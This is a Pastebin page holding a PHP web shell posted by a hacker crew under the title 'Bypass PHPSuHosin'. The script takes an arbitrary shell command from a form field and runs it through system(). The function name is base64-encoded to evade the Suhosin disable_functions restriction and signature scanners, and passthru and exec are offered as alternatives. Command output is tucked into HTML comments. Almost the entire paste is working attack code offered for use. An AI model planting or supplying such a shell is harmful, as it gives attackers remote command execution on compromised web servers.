Advertisement
HaNniBaL-KsA

Bypass PHPSuHosin

Oct 1st, 2011
1,712
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.29 KB | None | 0 0
  1. <?php
  2. ##############################
  3. #|     Bypass PHPSuHosin    |#
  4. ##############################
  5. #| By: HaNniBaL KsA (HK) :D |#
  6. #| r00t-s3cur1ty cr3w       |#
  7. #| Home: www.r00t-s3c.com   |#
  8. #|      P.S: enjoy :P       |#
  9. ##############################
  10. echo "<html><title>ByPass PHPSuHosin By:HK :D</title>
  11. <center><b><font size=\"7\" face=\"Tahoma\" >ByPass PHPSuHosin!</font>
  12. <br><font size=\"2\" face=\"Tahoma\" >This File Will Be Use [ Encode & Decode ] For ByPass PHPSuHosin ;D</font></b><br><br><br><br>
  13. * NOTE: This file will be bypass the disable_function'z in PHPSuHosin ONLY!<br><br>
  14. <form method=\"POST\" >
  15. Ur Command : <input type=\"text\" name=\"rs\" />
  16. <input type=\"submit\" value=\"ByPass\" name=\"hk\" />
  17. </form>
  18. </center></html>";
  19. $command = $_POST['rs'];
  20. $send = $_POST['hk'];
  21. $hk = "c3lzdGVt"; // system in base64_encode ;)
  22. #$hk = "cGFzc3RocnV="; // passthru in base64_encode ;)
  23. #$hk = "ZXhlY3=="; // exec in base64_encode ;)
  24. $rs = base64_decode($hk);
  25. if ($send) {
  26. print ("\n<!-- Command result! |START| -->\n\n"); // beter result in source!
  27. $rs ($command);
  28. print ("\n<!-- Command result! |END| -->\n\n"); // beter result in source!
  29. }
  30. echo "<center><br><br><br><br><b><font face=\"Tahoma\" size=\"2\" >By : HaNniBaL KsA (HK)<br>r00t-s3cur1ty cr3w</font></b></center>";
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement